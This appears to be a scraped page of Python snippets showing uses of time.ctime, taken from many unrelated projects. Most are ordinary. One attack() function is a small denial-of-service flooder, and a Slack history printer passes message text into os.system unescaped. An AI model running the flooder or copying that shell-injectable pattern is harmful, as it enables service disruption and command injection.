def __init__(self, localaddr, remoteaddr):
self._localaddr = localaddr
self._remoteaddr = remoteaddr
asyncore.dispatcher.__init__(self)
try:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(localaddr)
self.listen(5)
except:
# cleanup asyncore.socket_map before raising
self.close()
raise
else:
print >> DEBUGSTREAM, \
'%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
self.__class__.__name__, time.ctime(time.time()),
localaddr, remoteaddr)
python类ctime()的实例源码
def flatten(self, msg, unixfrom=False):
"""Print the message object tree rooted at msg to the output file
specified when the Generator instance was created.
unixfrom is a flag that forces the printing of a Unix From_ delimiter
before the first object in the message tree. If the original message
has no From_ delimiter, a `standard' one is crafted. By default, this
is False to inhibit the printing of any From_ delimiter.
Note that for subobjects, no From_ line is printed.
"""
if unixfrom:
ufrom = msg.get_unixfrom()
if not ufrom:
ufrom = 'From nobody ' + time.ctime(time.time())
print >> self._fp, ufrom
self._write(msg)
def load_stats(self, arg):
if not arg: self.stats = {}
elif isinstance(arg, basestring):
f = open(arg, 'rb')
self.stats = marshal.load(f)
f.close()
try:
file_stats = os.stat(arg)
arg = time.ctime(file_stats.st_mtime) + " " + arg
except: # in case this is not unix
pass
self.files = [ arg ]
elif hasattr(arg, 'create_stats'):
arg.create_stats()
self.stats = arg.stats
arg.stats = {}
if not self.stats:
raise TypeError, "Cannot create or construct a %r object from '%r''" % (
self.__class__, arg)
return
def __str__(self):
lines = []
lines.append("{0:s} object, bound to {1:s}.".format(self.__class__.__name__, self._cb.session.server))
if self._last_refresh_time:
lines.append(" Last refreshed at {0:s}".format(time.ctime(self._last_refresh_time)))
if not self._full_init:
lines.append(" Partially initialized. Use .refresh() to load all attributes")
lines.append("-"*79)
lines.append("")
for attr in sorted(self._info):
status = " "
if attr in self._dirty_attributes:
if self._dirty_attributes[attr] is None:
status = "(+)"
else:
status = "(*)"
val = str(self._info[attr])
if len(val) > 50:
val = val[:47] + u"..."
lines.append(u"{0:s} {1:>20s}: {2:s}".format(status, attr, val))
return "\n".join(lines)
def run(self):
while self.finish_time == 0:
time.sleep(.25)
global_step_val, = self.sess.run([self.global_step_op])
if self.start_time == 0 and global_step_val >= self.start_at_global_step:
# Use tf.logging.info instead of log_fn, since print (which is log_fn)
# is not thread safe and may interleave the outputs from two parallel
# calls to print, which can break tests.
tf.logging.info('Starting real work at step %s at time %s' %
(global_step_val, time.ctime()))
self.start_time = time.time()
self.start_step = global_step_val
if self.finish_time == 0 and global_step_val >= self.end_at_global_step:
tf.logging.info('Finishing real work at step %s at time %s' %
(global_step_val, time.ctime()))
self.finish_time = time.time()
self.finish_step = global_step_val
def build_full_record_to(pathToFullRecordFile):
"""structure of full record:
{commitID: {'build-time': time, files: {filename: {record}, filename: {record}}}}
"""
full_record = {}
# this leads to being Killed by OS due to tremendous memory consumtion...
#if os.path.isfile(pathToFullRecordFile):
# with open(pathToFullRecordFile, 'r') as fullRecordFile:
# print "loading full record from " + pathToFullRecordFile
# full_record = eval(fullRecordFile.read())
# print "read full record from " + pathToFullRecordFile
#else:
full_record = build_full_record()
# f = open(pathToFullRecordFile, 'w')
# try:
# f.write(repr(full_record) + "\n")
# except MemoryError as me:
# print me
# raise
# finally:
# print time.ctime()
# f.close()
# print "built full record, wrote to " + pathToFullRecordFile
return full_record
def build_full_record_to(path_to_full_record_file):
"""structure of full record:
{commitID: {'build-time': time, files: {filename: {record}, filename: {record}}}}
"""
full_record = build_full_record()
if DO_PRINT_RECORDS:
f = open(path_to_full_record_file, 'w')
try:
f.write(repr(full_record) + "\n")
except MemoryError as me:
print me
raise
finally:
print time.ctime()
f.close()
print "built full record, wrote to " + path_to_full_record_file
return full_record
def attack():
ip = socket.gethostbyname( host )
global n
msg=str(string.letters+string.digits+string.punctuation)
data="".join(random.sample(msg,5))
dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
n+=1
dos.connect((ip, port))
dos.send( "GET /%s HTTP/1.1\r\n" % data )
print "\n "+time.ctime().split(" ")[3]+" "+"["+str(n)+"] #-#-# Hold Your Tears #-#-#"
except socket.error:
print "\n [ No connection! Server maybe down ] "
dos.close()
def flatten(self, msg, unixfrom=False):
"""Print the message object tree rooted at msg to the output file
specified when the Generator instance was created.
unixfrom is a flag that forces the printing of a Unix From_ delimiter
before the first object in the message tree. If the original message
has no From_ delimiter, a `standard' one is crafted. By default, this
is False to inhibit the printing of any From_ delimiter.
Note that for subobjects, no From_ line is printed.
"""
if unixfrom:
ufrom = msg.get_unixfrom()
if not ufrom:
ufrom = 'From nobody ' + time.ctime(time.time())
print >> self._fp, ufrom
self._write(msg)
def run(interval, command):
print_ts("-"*100)
print_ts("Command %s"%command)
print_ts("Starting every %s seconds."%interval)
print_ts("-"*100)
while True:
try:
# sleep for the remaining seconds of interval
time_remaining = interval-time.time()%interval
print_ts("Sleeping until %s (%s seconds)..."%((time.ctime(time.time()+time_remaining)), time_remaining))
time.sleep(time_remaining)
print_ts("Starting command.")
# execute the command
status = os.system(command)
print_ts("-"*100)
print_ts("Command status = %s."%status)
except Exception, e:
print e
def run(self, edit):
"""Sublime Text plugin run method."""
# Note, if one changes the header, this might need to change too.
pattern = util.get_vhdl_setting(self, 'vhdl-modified-time-string')
region = self.view.find(pattern, 0)
#print('Region Diagnostics')
#print('------------------')
#print('Begin: {}'.format(region.begin()))
#print('End: {}'.format(region.end()))
#print('Empty? {}'.format(region.empty()))
if not region.empty():
region = self.view.line(region)
date = time.ctime(time.time())
new_mtime = pattern + '{}'.format(date)
self.view.replace(edit, region, new_mtime)
print('vhdl-mode: Updated last modified time.')
else:
print('vhdl-mode: No last modified time field found.')
#----------------------------------------------------------------
def convert_all_files_in_path(self, path):
if not os.path.exists(path):
print("'%s': Path doesn't exists. Skipping" % path)
return
count = 0
for filename in os.listdir(path):
full_path = os.path.join(path, filename)
only_name, ext = os.path.splitext(full_path)
cmd = None
pyfile = None
if fnmatch.fnmatch(filename, '*.ui'):
pyfile = '%s.py' % only_name
cmd = self.PYUIC
elif fnmatch.fnmatch(filename, '*.qrc'):
pyfile = '%s_rc.py' % only_name
cmd = self.PYRCC
if cmd and modified(full_path, pyfile):
cmd_string = '%s -o "%s" "%s"' % (cmd, pyfile, full_path)
os.system(cmd_string)
count += 1
print("'%s': %s converted %s files" % (path, time.ctime(time.time()), count))
def file_mod_time(filepath):
try:
import time
return time.ctime(os.path.getmtime(filepath))
except Exception as e:
if DEBUG_FLAG:
sys.stderr.write("Naked Framework Error: unable to return file modification data with the file_mod_time() function (Naked.toolshed.system).")
raise e
#------------------------------------------------------------------------------
#
# FILE LISTINGS
#
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# [ list_all_files function ] (list)
# returns a list of all files in developer specified directory
# Tests: test_SYSTEM.py :: test_sys_list_all_files, test_sys_list_all_files_emptydir
#------------------------------------------------------------------------------
def file_mod_time(filepath):
try:
import time
return time.ctime(os.path.getmtime(filepath))
except Exception as e:
if DEBUG_FLAG:
sys.stderr.write("Naked Framework Error: unable to return file modification data with the file_mod_time() function (Naked.toolshed.system).")
raise e
#------------------------------------------------------------------------------
#
# FILE LISTINGS
#
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# [ list_all_files function ] (list)
# returns a list of all files in developer specified directory
# Tests: test_SYSTEM.py :: test_sys_list_all_files, test_sys_list_all_files_emptydir
#------------------------------------------------------------------------------
def print_history(self, response, channel_name):
os.system("clear; figlet '" + channel_name + "' | lolcat")
response["messages"].reverse()
text = ""
for i in response["messages"]:
if "user" in i:
text += "\033[31m" + self.find_user_name(i["user"]) + "\033[0m" + "\t\t"
elif "username" in i:
text += "\033[31m" + (i["username"].encode('ascii', 'ignore').decode('ascii')) + "\033[0m" + "\t"
text += "\033[93m" + time.ctime(float(i["ts"])) + "\033[0m" + "\n"
# replace username_id with username
if "<@" in i["text"]:
i["text"] = "<" + i["text"].split("|")[1]
text += (i["text"].encode('ascii', 'ignore').decode('ascii')) + "\n\n"
os.system("echo ' " + text + "'")
text = ""
def __init__(self, localaddr, remoteaddr):
self._localaddr = localaddr
self._remoteaddr = remoteaddr
asyncore.dispatcher.__init__(self)
try:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(localaddr)
self.listen(5)
except:
# cleanup asyncore.socket_map before raising
self.close()
raise
else:
print >> DEBUGSTREAM, \
'%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
self.__class__.__name__, time.ctime(time.time()),
localaddr, remoteaddr)
def log(self,proto,data):
if not self.logging: return
peer = self.transport.getPeer()
their_peer = self.otherConn.transport.getPeer()
f=open(self.logging,"a")
f.write("%s\t%s:%d %s %s:%d\n"%(time.ctime(),
peer.host,peer.port,
((proto==self and '<') or '>'),
their_peer.host,their_peer.port))
while data:
p,data=data[:16],data[16:]
f.write(string.join(map(lambda x:'%02X'%ord(x),p),' ')+' ')
f.write((16-len(p))*3*' ')
for c in p:
if len(repr(c))>3: f.write('.')
else: f.write(c)
f.write('\n')
f.write('\n')
f.close()
def flatten(self, msg, unixfrom=False):
"""Print the message object tree rooted at msg to the output file
specified when the Generator instance was created.
unixfrom is a flag that forces the printing of a Unix From_ delimiter
before the first object in the message tree. If the original message
has no From_ delimiter, a `standard' one is crafted. By default, this
is False to inhibit the printing of any From_ delimiter.
Note that for subobjects, no From_ line is printed.
"""
if unixfrom:
ufrom = msg.get_unixfrom()
if not ufrom:
ufrom = 'From nobody ' + time.ctime(time.time())
print >> self._fp, ufrom
self._write(msg)
def update_schedule(self, result = None, retval = None, extra_args = None):
nowTime = time()
nowTimereal = ctime(nowTime)
if nowTime > 10000:
print '[NTP]: setting E2 unixtime:',nowTime
print '[NTP]: setting E2 realtime:',nowTimereal
setRTCtime(nowTime)
if config.misc.SyncTimeUsing.value == "1":
eDVBLocalTimeHandler.getInstance().setUseDVBTime(False)
else:
eDVBLocalTimeHandler.getInstance().setUseDVBTime(True)
eEPGCache.getInstance().timeUpdated()
self.timer.startLongTimer(int(config.misc.useNTPminutes.value) * 60)
else:
print 'NO TIME SET'
self.timer.startLongTimer(10)
def __repr__(self):
timertype = {
TIMERTYPE.NONE: "nothing",
TIMERTYPE.WAKEUP: "wakeup",
TIMERTYPE.WAKEUPTOSTANDBY: "wakeuptostandby",
TIMERTYPE.AUTOSTANDBY: "autostandby",
TIMERTYPE.AUTODEEPSTANDBY: "autodeepstandby",
TIMERTYPE.STANDBY: "standby",
TIMERTYPE.DEEPSTANDBY: "deepstandby",
TIMERTYPE.REBOOT: "reboot",
TIMERTYPE.RESTART: "restart"
}[self.timerType]
if not self.disabled:
return "PowerTimerEntry(type=%s, begin=%s)" % (timertype, ctime(self.begin))
else:
return "PowerTimerEntry(type=%s, begin=%s Disabled)" % (timertype, ctime(self.begin))
def getPriorityCheck(self,prioPT,prioPTae):
shiftPT = breakPT = False
nextPTlist = NavigationInstance.instance.PowerTimer.getNextPowerManagerTime(getNextTimerTyp = True)
for entry in nextPTlist:
#check timers within next 15 mins will started or ended
if abs(entry[0] - time()) > 900:
continue
#faketime
if entry[1] is None and entry[2] is None and entry[3] is None:
if debug: print "shift#2 - entry is faketime", ctime(entry[0]), entry
shiftPT = True
continue
#is timer in list itself?
if entry[0] == self.begin and entry[1] == self.timerType and entry[2] is None and entry[3] == self.state \
or entry[0] == self.end and entry[1] is None and entry[2] == self.afterEvent and entry[3] == self.state:
if debug: print "entry is itself", ctime(entry[0]), entry
nextPTitself = True
else:
nextPTitself = False
if (entry[1] in prioPT or entry[2] in prioPTae) and not nextPTitself:
if debug: print "break#2 <= 900", ctime(entry[0]), entry
breakPT = True
break
return shiftPT, breakPT
def TimeSynctimer(self):
now = time()
self.syncCount += 1
if now <= 31536000:
if self.syncCount <= 24 and now <= 31536000: # max 2 mins or when time is in sync
self.timesynctimer.start(5000, True)
else:
print "~"*100
print "[NAVIGATION] time sync failure, current time is %s, sync time is %s sec." % (ctime(now),(self.syncCount * 5))
if self.timertime > 0:
print "[NAVIGATION] next '%s' starts at %s" % ({0:"record-timer",1:"zap-timer",2:"power-timer",3:"plugin-timer"}[self.wakeuptyp], ctime(self.timertime))
else:
print "[NAVIGATION] no next timers"
print "="*100
#workaround for normal operation if no time sync after e2 start - box is in standby
self.gotopower()
else:
print "~"*100
print "[NAVIGATION] time sync successful, current time is %s, sync time is %s sec." % (ctime(now),(self.syncCount * 5))
self.wakeupCheck()
def log_events(log_info, type_event):
log_msg = "[" + time.ctime() + "]" + "\n" + log_info
if type_event == "fuzzing":
try:
fd = open('fuzz.log', 'a')
except IOError as err:
return "[!] Error opening log file: %s" % str(err)
elif type_event == "error":
try:
fd = open('error.log', 'a')
except IOError as err:
return "[!] Error opening error file: %s" % str(err)
else:
return "[!] '%s' is an unrecognized log event type." % type_event
if fd:
fd.write(log_msg)
return
def show_workspace_files(user_id, special_type='uploads'):
import time
import base64
user_files = []
user_path = os.path.join(get_config('env', 'workspace'), str(user_id), special_type)
if not os.path.exists(user_path):
os.makedirs(user_path)
for file_name in os.listdir(user_path):
file_path = os.path.join(user_path, file_name)
tmp = dict()
tmp['name'] = file_name
tmp['file_size'] = os.path.getsize(file_path)
tmp['file_create'] = time.ctime(os.path.getctime(file_path))
tmp['trace'] = base64.b64encode(os.path.join(special_type, file_name))
tmp['raw'] = os.path.join(special_type, file_name)
user_files.append(tmp)
user_files = sorted(user_files, key=lambda user_files: user_files['name'])
return user_files
def predict_tf_all(path = None):
result_list = []
p = m_Pool(31)
result_list = p.map(predict_tf_once,range(1,32))
p.close()
p.join()
print 'writing...'
result_df = pd.DataFrame(index = range(1))
for day,result in result_list:
day_s = str(day)
if len(day_s)<=1:
day_s = '0'+day_s
result_df['201610'+day_s] = result
result_df = result_df.T
result_df.columns = ['predict_power_consumption']
if path == None:
date = str(pd.Timestamp(time.ctime())).replace(' ','_').replace(':','_')
path = './result/'+date+'.csv'
result_df.to_csv(path,index_label='predict_date')
l = map(lambda day:pd.DataFrame.from_csv('./result/predict_part/%d.csv'%day),range(1,32))
t = pd.concat(l)
t.to_csv('./result/predict_part/'+date+'.csv')
def signal_handler(signum, *kwargs):
""" A handler for various interrupts
"""
global exit_flag
exit_flag = True
if signum == signal.SIGINT:
print(ERROR + "user quit" + Style.RESET_ALL)
else:
print(ERROR + "signal caught: {}".format(signum) + Style.RESET_ALL)
print("[*] shutting down at {}".format(time.ctime()))
# let time for the threads to terminate
time.sleep(2)
sys.exit(0)
def cache_it(self, key, f, time_expire):
if self.debug:
self.r_server.incr('web2py_cache_statistics:misses')
cache_set_key = self.cache_set_key
expire_at = int(time.time() + time_expire) + 120
bucket_key = "%s:%s" % (cache_set_key, expire_at / 60)
value = f()
value_ = pickle.dumps(value, pickle.HIGHEST_PROTOCOL)
if time_expire == 0:
time_expire = 1
self.r_server.setex(key, time_expire, value_)
# print '%s will expire on %s: it goes in bucket %s' % (key, time.ctime(expire_at))
# print 'that will expire on %s' % (bucket_key, time.ctime(((expire_at / 60) + 1) * 60))
p = self.r_server.pipeline()
# add bucket to the fixed set
p.sadd(cache_set_key, bucket_key)
# sets the key
p.setex(key, time_expire, value_)
# add the key to the bucket
p.sadd(bucket_key, key)
# expire the bucket properly
p.expireat(bucket_key, ((expire_at / 60) + 1) * 60)
p.execute()
return value
def do_ls(self, wildcard, display = True):
if self.loggedIn is False:
logging.error("Not logged in")
return
if self.tid is None:
logging.error("No share selected")
return
if wildcard == '':
pwd = ntpath.join(self.pwd,'*')
else:
pwd = ntpath.join(self.pwd, wildcard)
self.completion = []
pwd = string.replace(pwd,'/','\\')
pwd = ntpath.normpath(pwd)
for f in self.smb.listPath(self.share, pwd):
if display is True:
print "%crw-rw-rw- %10d %s %s" % (
'd' if f.is_directory() > 0 else '-', f.get_filesize(), time.ctime(float(f.get_mtime_epoch())),
f.get_longname())
self.completion.append((f.get_longname(), f.is_directory()))
def draw(self, context):
layout = self.layout
netsettings = context.scene.network_render
row = layout.row()
row.template_list("UI_UL_list", "net_render_slaves", netsettings, "slaves",
netsettings, "active_slave_index", rows=2)
sub = row.column(align=True)
sub.operator("render.netclientslaves", icon='FILE_REFRESH', text="")
sub.operator("render.netclientblacklistslave", icon='ZOOMOUT', text="")
if len(netrender.slaves) > netsettings.active_slave_index >= 0:
layout.separator()
slave = netrender.slaves[netsettings.active_slave_index]
layout.label(text="Name: " + slave.name)
layout.label(text="Address: " + slave.address[0])
layout.label(text="Seen: " + time.ctime(slave.last_seen))
layout.label(text="Stats: " + slave.stats)
def draw(self, context):
layout = self.layout
netsettings = context.scene.network_render
row = layout.row()
row.template_list("UI_UL_list", "net_render_slaves_blacklist", netsettings, "slaves_blacklist",
netsettings, "active_blacklisted_slave_index", rows=2)
sub = row.column(align=True)
sub.operator("render.netclientwhitelistslave", icon='ZOOMOUT', text="")
if len(netrender.blacklist) > netsettings.active_blacklisted_slave_index >= 0:
layout.separator()
slave = netrender.blacklist[netsettings.active_blacklisted_slave_index]
layout.label(text="Name: " + slave.name)
layout.label(text="Address: " + slave.address[0])
layout.label(text="Seen: " + time.ctime(slave.last_seen))
layout.label(text="Stats: " + slave.stats)